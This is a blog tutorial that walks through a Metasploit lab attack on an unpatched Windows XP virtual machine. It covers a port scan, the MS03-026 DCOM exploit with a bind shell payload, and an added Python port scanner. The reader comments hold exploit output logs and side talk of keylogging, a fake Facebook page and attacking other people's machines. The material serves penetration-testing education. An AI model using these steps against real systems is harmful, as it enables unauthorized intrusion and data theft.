Friday, February 14, 2014

Penetration Testing - Hacking XP

Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing, but we aren't going the ideal way. I'm gonna teach you penetration testing the way I learnt it: by doing actual penetration and exploitation. We can't hack a completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need a victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.

What are you going to need

Knowledge

  • Basic penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation in this tutorial)
  • The tough manual way of penetration testing (a large batch of advanced material which will help you become a great pentester if you have the patience to read it all and the capability to understand it)
  • VMware Tools (without VMware Tools there is no way you can have Kali Linux (attacker machine) and unpatched XP (target machine) running at the same time on one single computer)

Virtual Machines

  • Kali Linux (click the link for a complete detailed guide)
  • Windows XP (after you've followed the tutorial above for installing Kali Linux, installing XP on a VM will be a piece of cake; a few screenshots of the process)

Now there is a catch with Windows XP. While Kali Linux is free, Windows XP is not, so you have to buy one (I won't promote piracy here). Just make sure that when you are buying a Windows XP CD, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look on your shelves for an old XP CD that you bought years ago, which is gathering dust, and put it to some use.

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that Metasploit needs which aren't started at system startup. So here are the commands you need to execute in your console before you can start Metasploit:
service postgresql start
(Metasploit uses PostgreSQL as its database, so it needs to be launched first.)

With PostgreSQL up and running, we next need to launch the Metasploit service. The first time the service is launched, it will create an msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and web servers it requires.
service metasploit start
Now, finally, we are ready to start the Metasploit Framework.
msfconsole

Looking at the targets

Right now, my Metasploit Framework is running on Kali, on VMware, on a Windows 8 machine. There is also a Windows XP SP3 virtual machine running side by side with my Kali. So what we need to do is detect these machines from the Metasploit Framework. For this we'll do a port scan.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name of auxiliary scanner. To use it, enter the following command:
use auxiliary/scanner/portscan/tcp
Type show options to see the available options:
show options
Now we have to change a few settings. Firstly, we should reduce the number of ports scanned:
set PORTS 1-500
Secondly, we have to specify a target IP to scan. This is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack), open a command prompt and type
ipconfig
In the results, check the IP of the machine. This is what you'll have to set the RHOSTS option to.
In my case the IP is 192.168.63.131
Now go back to your Kali machine and type the following (change the IP as required):
set RHOSTS 192.168.63.131
Note that in my original screenshot of this step I spelled RHOSTS wrong. Make sure you add the 's' at the end: the scanner module's option is RHOSTS, not RHOST.
Now we are ready for some action. Do a show options again to see all the changes you've made. Finally, type
run
The scan will start and after some time it will show you which TCP ports are open, i.e. reachable from the attacker machine.
If you are not using an unpatched version of Windows, there will not be any open ports.
In my first scan this is exactly what happened: no open ports were found, so there was nothing much to do. However, if you have better luck and a vulnerable machine, you will have some open ports. In my case, I turned off the firewall on the Windows machine and ran the auxiliary module again.
I got 3 open ports this time. If you are using a higher XP version, you too might need to disable the firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 with ports 135, 139 and 445 open.
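To make clear what the auxiliary/scanner/portscan/tcp module is actually doing, and why the first scan above came back empty until the XP firewall was turned off, here is a small TCP connect scanner. It is an added example written for this page, not code from the tutorial or from Metasploit. It reports three states rather than just "open": a port that answers with a RST is closed (the host is reachable, nothing is listening), while a port that never answers is filtered, which is what a host firewall silently dropping packets looks like. Because it cannot reach a lab VM from here, the loopback_demo() helper stands up a throwaway listener on 127.0.0.1 and scans that, plus port 1 as a constructed "closed" port; the PORTS syntax it parses ("1-500", "135,139,445") is the same one the Metasploit module accepts.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Port states, named the way Metasploit's tcp scanner and Nmap report them.
OPEN, CLOSED, FILTERED = "open", "closed", "filtered"


def probe_port(host, port, timeout=1.0):
    """TCP connect() probe of a single port (the probe the tcp scanner module sends).

    open     -> the three-way handshake completed, so something is listening
    closed   -> the host answered with a RST: reachable, but nothing listening
    filtered -> no answer before the timeout, which is exactly what a host
                firewall that silently drops SYN packets looks like
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return OPEN
        except socket.timeout:
            return FILTERED
        except ConnectionRefusedError:
            return CLOSED
        except OSError:
            # no route / host unreachable: indistinguishable from a dropped packet
            return FILTERED


def parse_port_spec(spec):
    """Parse a Metasploit-style PORTS value such as '1-500' or '135,139,445'."""
    ports = []
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.extend(range(int(lo), int(hi) + 1))
        elif part:
            ports.append(int(part))
    return ports


def scan(host, port_spec="1-500", timeout=1.0, workers=64):
    """Probe every port in port_spec concurrently; return {port: state}."""
    ports = parse_port_spec(port_spec)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def summarize(results):
    """Group ports by state so that a scan with no open ports is still informative."""
    summary = {OPEN: [], CLOSED: [], FILTERED: []}
    for port, state in sorted(results.items()):
        summary[state].append(port)
    return summary


def loopback_demo(extra_closed_port=1):
    """Offline demonstration (constructed input): listen on a random loopback port,
    scan it together with extra_closed_port, then close the listener.
    Returns (listener_port, summary)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    port = listener.getsockname()[1]
    try:
        results = scan("127.0.0.1", f"{port},{extra_closed_port}")
    finally:
        listener.close()
    return port, summarize(results)


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    summary = summarize(scan(target))
    print(f"{target}: open ports {summary[OPEN]}")
    if not summary[OPEN]:
        if not summary[CLOSED]:
            print("every probe timed out: a firewall is probably dropping the packets")
        else:
            print("host reachable, but nothing is listening in this range")
```

Run it as `python scanner.py 192.168.63.131` against your own lab VM. The closed/filtered split is the useful part: an all-filtered result means the XP firewall is on (the situation in the first scan above), while a host that shows 135, 139 and 445 as open is exposing the RPC and SMB services that the rest of this tutorial targets, which is exactly what a defender would want to find and firewall off or patch.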


Real life port scan

In an actual pentesting environment, you don't know the IP, open ports or OS of the target computer. In such cases, we can use the Nmap port scanner, which is much more capable than the auxiliary module. We'll come to that later.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of the auxiliary scanner, then search for dcom in msfconsole:
search dcom
This is a very famous exploit for Windows.
Copy the name of exploit number 3 (the one whose rank shows as great). On the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again:
show options
Again, set RHOST to 192.168.63.131 (replace it with the IP of your target). Note that this exploit module's option is RHOST, without the 's':
set RHOST 192.168.63.131
Also, set a payload:
set PAYLOAD windows/shell_bind_tcp

And here's the best part
exploit

You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what you can do from here on. I'll come up with more in the next tutorial.
Update: the next tutorial is here. It discusses the post-exploitation fun that you can have with the meterpreter payload: Post exploitation fun in an exploited XP machine.
We have a pentesting lab now and have successfully exploited an XP machine.

82 comments:

  1. Thanks for letting us know. The explanation of various type of virtual networking is really lucid and detailed.

  2. If it is not clear enough, you have to substitute remote_host with the IP of your target XP machine, the one you were successfully pinging.

  3. hello... :p I have a problem. The IP that I use for the Facebook fake page as the address doesn't work on other computers, but on my computer it easily works. Why?? I am using a VM........ Kali Linux

    Replies
    1. I don't understand your problem. Please elaborate, give more details. I don't see what is the use of Facebook fake page IP in this pentesting tutorial.

    2. Dude, you are running your fake page under a local IP; you probably aren't forwarding the right ports.
      That, and whatever you decide to run your fake FB page on, you will need to buy the right domain, which I am sure someone has already purchased.

  4. I have Kali Linux and Win XP (unpatched) using VMware, using NAT connections; both communicate fine with each other (seemingly). I can find open ports on unpatched XP using use auxiliary/scanner/portscan/tcp. But when I run exploit, nothing happens. No cmd box opens on XP. Nothing at all. I've followed your instructions. I turned off automatic updates of XP after installation finished. I also turned off the firewall. I'm unsure why it has not worked. Can you help?

    Replies
    1. Same here. Can you help please? -l doesn't work

  5. [*] Sending exploit ...
    msf exploit(ms03_026_dcom) > run

    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.**.**[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.**.***[135] ...
    [*] Sending exploit ...
    msf exploit(ms03_026_dcom) > -l
    [-] Unknown command: -l.
    msf exploit(ms03_026_dcom) > -l
    [-] Unknown command: -l.
    msf exploit(ms03_026_dcom) > sessions -i 1
    [-] Invalid session id
    msf exploit(ms03_026_dcom) > show options

    Module options (exploit/windows/dcerpc/ms03_026_dcom):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.44.138 yes The target address
    RPORT 135 yes The target port


    Payload options (windows/shell_bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
    LPORT 4444 yes The listen port
    RHOST 192.168.44.138 no The target address


    Exploit target:

    Id Name
    -- ----
    0 Windows NT SP3-6a/2000/XP/2003 Universal


    msf exploit(ms03_026_dcom) >

    Replies
    1. Nothing wrong with the ping. And the netapi method works. I have cmd prompt now.

    2. I've the same problem as this one.
      I've turned off my firewall and I can ping my XP from Kali and vice versa.
      I've tried using both dcom and netapi, but in both cases I got stuck..
      In case of dcom I'm stuck at this point:
      [*] Sending exploit ...

      and in case of netapi I'm stuck at this point:
      [*] Attempting to trigger the vulnerability...


      No error whatsoever.. Please Please Please help me...

    3. Thanks, but where can I get my hands on an unpatched Windows XP? I've searched but no success...

    4. I'm not sure where to get it. I myself had a tough time getting one. Try downloading an XP SP1. It's likely to be unpatched.

    5. Instead of "exploit" put "check" to review if it is vulnerable

  6. Hey, I tried to run this exploit and it seemed to work perfectly (I did have to disable the firewall on my XP). My only problem was at the very end: it didn't give me any errors, but I don't get anything after the exploit has been used, I just get "msf exploit(ms03_026_dcom) >" afterwards, not the Windows shell I expect. Did I miss a step? I tried this 3 times, restarting both machines twice. Could it be because I am using Service Pack 2? I am able to ping them both.


    ~Firepyro

    Replies
    1. Look at the comment above. The guy had the same problem. Using netapi instead of MS03 helped solve the issue. SP2 might not be vulnerable to MS03.

    2. Oh, whoops I passed over that one xD Thanks for responding so quickly! Sorry for the dumb question.

      ~Firepyro

    3. No, it's all right. Questions like these help others when they face similar issues.

    4. I have the same problem.
      Could you please tell me what's the netapi method ?

  7. Bit of an off-topic question: I want to make some of this automatic. If I would use batch in Windows, what would be the Kali equivalent?

    Replies
    1. Thank you, this helped a lot!

  8. Turn off your firewall, disable your Antivirus (if any). Make sure the vulnerability is not already patched in your system.

  9. From start to exploit it worked perfectly, but my question is how can I access the victim PC's files and how can I install something like a keylogger? Please help me.
    Regards, osama asghar :)

    Replies
    1. And last thing, can we keylog Google Chrome? meterpreter> keyscan_dump

  10. Is there any way for me to check if my XP system has already been patched? I am feeling like this is the problem as I have already tried reverse_tcp as well as meterpreter. I found that my virtual network may not be configured the best that it can be...would you recommend a host only?

  11. By the way, was your site format changed or something?

  12. And yeah, I changed the design of my website. It has done more harm than good though, as my search rankings dropped overnight, and traffic dropped from 2K visits/day to 1K/day.

  13. I really like the site as far as content goes. The new layout did throw me off, but that's no problem. I am fairly certain that the exploits will not work because I downloaded XP from Microsoft's free VM files, so it's likely patched to hell. I have been using Metasploitable 2 and it's been pretty cool; I'm able to gain control over the command prompt using Armitage, but after messing with Armitage a little bit more, I don't see how someone would not be able to use it successfully with Metasploitable. I hope to see more tutorials on more recent operating systems soon!

  14. The layout hasn't been appreciated by the visitors, nor by the search engine spiders. I think I'll change it.

  15. Just letting ya know, I think the new layout is interesting, but it's hard for me as a beginner to really understand or see a linear layout of where to go from. That may be what mainly threw people off. At first I thought I was on the wrong site. lol

  16. I have a copy of XP. Using VM or virtual box I would normally use an ISO image. Is there a way to convert my copy of XP to an ISO image ?

    Replies
    1. It would be great if you could be more specific. What do you mean by 'having a copy of XP'. If you mean that you don't have the installation ISO, but the installed files on a system, then you can use vmware vcenter converter. Let me know more details of your situations so I can give a specific answer.

  17. Sorry. I mean by copy, I have it on a disc, original Microsoft XP disc. Can I copy it to a format, i.e, ISO image.

  18. Use daemon tools. They have an option to save the content from CD or DVD as an isolated file. I think alcohol 120 also provides the same functionality.

    Replies
    1. Sorry autocorrect converted iso to isolated.

    2. Any idea on this?
      After exploit command

      Started bind handler


      --- Exploit completed, but no session was created


      ""msf exploit(ms03_026_dcom) > set RHOST 192.168.148.131
      RHOST => 192.168.148.131
      msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
      PAYLOAD => windows/shell_bind_tcp
      msf exploit(ms03_026_dcom) > exploit

      [*] Started bind handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      msf exploit(ms03_026_dcom) >
      ""

  19. Thank you. It will be more practical converted to an ISO image. I can then store it on a usb with my many other ISO images of various operating systems.
    I think the appearance of your site is great. There is no such thing as perfect. I arrive and leave a little wiser, that in my book is a success and a site worth bookmarking. 10 out of 10.

  20. Is there something similar for Windows 8?

  21. Need help. I got all the way to exploiting; I had to change the target port because 135 wouldn't work, but after all that it failed to bind. Help!!

  22. Both my XP & Kali are showing the same IP address, please help

  23. Perhaps you are using Oracle's VirtualBox; that's why you have the same IP on both machines........ Same case was mine.... so I started using VMware

    Replies
    1. I read the conversation...... same problem with me. Can't get into XP...... same as yours
      [*] Started bind handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
      [*] Sending exploit ...
      msf exploit(ms03_026_dcom) >

      I am again in msf rather than in the cmd of XP...
      Did anyone figure it out?? Please do help

    2. I've the same problem, still don't understand it...

  24. I hacked XP using windows/meterpreter/reverse_tcp but it's working for VirtualBox only!!!!!!!!!

    When I am trying to hack my friend's system (he knows it) it's not connecting????

    Stuck at [*] Starting the payload handler.....

    Replies
    1. Are you sure you are using his public IP instead of his home IP?
      And is it his IP, or his ISP's DNS IP, or his real IP?

  25. Thanks to the author. I finished this tutorial. For your information, I had some problems with installing Kali Linux, which you posted at --> http://kalitutorials.net/2014/02/complete-detailed-guide-on-installing.html
    If I follow your steps one by one, in step 14 the screen shows 'Network autoconfiguration failed', and your advice is to choose 'Do not configure the network at this time', and that made the problems. You cannot ping anywhere. The solution is easy: in step 8, in Network Adapter, select NAT, that's all. Hope this post will be useful for some guys :)

  26. I am attempting the netapi exploit on a pirated Windows 7 (not a VM) on SP1. After digging around through different payloads, meterpreter works the best, but it still failed. I had everything set: RPORT was 445 (neither 135 nor 139 will work), RHOST was 10.0.0.15, LHOST was 10.0.0.16, and LPORT was 4444.
    Here's what happened:
    [*] Started reverse handler on 10.0.0.16:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [-] Exploit aborted due to failure: no-target: No matching target
    msf exploit(ms08_067_netapi) >

    Any help???

    Replies
    1. You should try exploiting XP first. You're jumping way ahead of the tutorial.

  27. Help , I've tried both the netapi and the dcom method but at the end the result is
    " Exploit failed: the following options failed to validate: RHOST.
    msf exploit(ms08_067_netapi) > " . Please help at the earliest !

  28. Failed to start metasploit.service : Unit metasploit.service failed to load: no such file or directory.

    I get this error after giving the command "service metasploit start". I have searched online for a solution but found none; can you help me?

    Replies
    1. The way to start Metasploit has been changed. Check this link:
      https://www.kali.org/news/kali-linux-20-released/

      # Start the Postgresql Database
      /etc/init.d/postgresql start

      # Initialize the Metasploit Framework Database
      msfdb init

      # Run msfconsole
      msfconsole

  29. How would we do this manually? In this tutorial we let the tools do all the work, but how would I, as a complete newbie at this, do all of this manually / use as few tools as possible? I'd like to actually understand how it all works.

  30. Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (IP Address) What does this mean?

  31. After "[*] Sending exploit"... I am redirected to "msf exploit(ms03_026_dcom) > "

    why is that?

  33. Exploit failed : Rex: : Porto: : dcerpc : : exception:: invalid packet invalid packet. DCERPC response packet is imcomplet


    What does this mean ? How do I fix it ?

  34. Same issue for me as well: redirected back to the msf console instead of the XP command window.
    Any help would be appreciated, author

  35. No use in hacking an XP workstation anyway, especially nowadays. Everybody uses WIN7 or greater.

  36. Hello, when I run the exploit I get this:

    [*]Started bind handler
    [*]Trying target Windows NT SP#-6a/2000/XP/2003 Univesal...
    [*]Biding to "some numbers":0.0@ncacn_ip_tcp:"ip adress[port]"
    [-]Exploit failed: Rex::Proto::DCERPC::Exceptions::InvalidPacket invalid PAcket. DCERPC response packetis incomplete

    Did I get something wrong??

    Thanks for the help

  37. It says exploit completed, but no session was created. How do I fix this?

    Replies
    1. Same here, both with tcp and netapi

  38. LOL, very new to this. I got all the way without really reading the scan. I have a really old XP SP3 machine that I threw up. The scan came back with two open ports, 445 and 139, not 135 like yours above, so my exploit didn't work. Told me exploit failed, I'm assuming because it likes port 135. I tried loading another module at windows/smb/ms04_0331_netdde and it keeps failing. Are there more modules to try? I did the com search command but it only came up with the ones you have.

    Replies
    1. SP3 is patched and you need an unpatched version of XP

  39. Hi all,
    I do not get the port step. Why do we need to set the number of ports and not leave it at the default, and why don't we use them (we just have to make sure they exist?).

    THX, Amit

  40. Can you do a tutorial on how to hack Mac?

  41. I can't seem to be able to get any of the ports open. I have disabled the Windows Firewall and added exceptions for the ports you got open, but nothing I do seems to work. Please suggest any ideas that could help me get a port open. I tried an Nmap scan and the first time I did it, it said port 80 was open, but when I scanned again it said it was filtered.

    Replies
    1. I forgot to mention I have Windows XP Pro SP3.

    2. Also, I don't know if this helps, but I'm running it on Windows XP Mode on a Windows 7 PC I have.

  42. msf > use auxilary/scanner/portscan/tcp
    [-] Failed to load module: auxilary/scanner/portscan/tcp
    Please help, I'm stuck at this level

  43. I would like to get remote access to a router which is 300 miles away. I have the password, MAC address, user name for the router, password for the router, IP address for the router, all the router settings; I just don't know how to connect to it. It's my sister's router and she knows I am trying to do this with Kali Linux so as to learn more about pen testing.
    Any help would be most appreciated.
    Thanks in advance.

  44. I would like to get remote access to a router which is 300 miles away. I have the password, MAC address, user name for the router, password for the router, IP address for the router, all the router settings; I just don't know how to connect to it. It's my sister's router and she knows I am trying to do this with Kali Linux so as to learn more about pen testing.
    Any help would be most appreciated.
    Thanks in advance.


    THIS IS VERY INTERESTING QUE.. PLZ RESP AUTHOR.. REPLY APPRECIATED..

  45. Hi, I'm a newbie to Metasploit. After I run this tutorial I get "exploit completed but no session was created"

    OS is Windows 7

  46. When I start the exploit, the Windows XP machine shuts down. I get the system shutdown window showing this error: "windows must now restart because remote procedure call (RPC) service terminated unexpectedly"

  48. I get this error when I hit exploit: "Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out(remote host ip)"
    I have disabled the firewall on the XP virtual machine I tried to attack. I have also stopped the automatic updates. Can anyone help me? Thanks

    Replies
    1. I should also say that the ip from the kali linux virtual machine is the same as the xp one.

    2. The IPs should not be the same. Maybe you are looking at the external IP, not the internal one.

  49. So once I run the exploit it "works successfully" but I don't get any return for the opened shell. I type exploit, I get no error messages and it says the exploit worked but it just hangs after that with no possible command input.
    Any idea what I could have done wrong?

    Replies
    1. Never mind. I just dicked with it and got it to work with NETAPI instead of DCOM.


© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC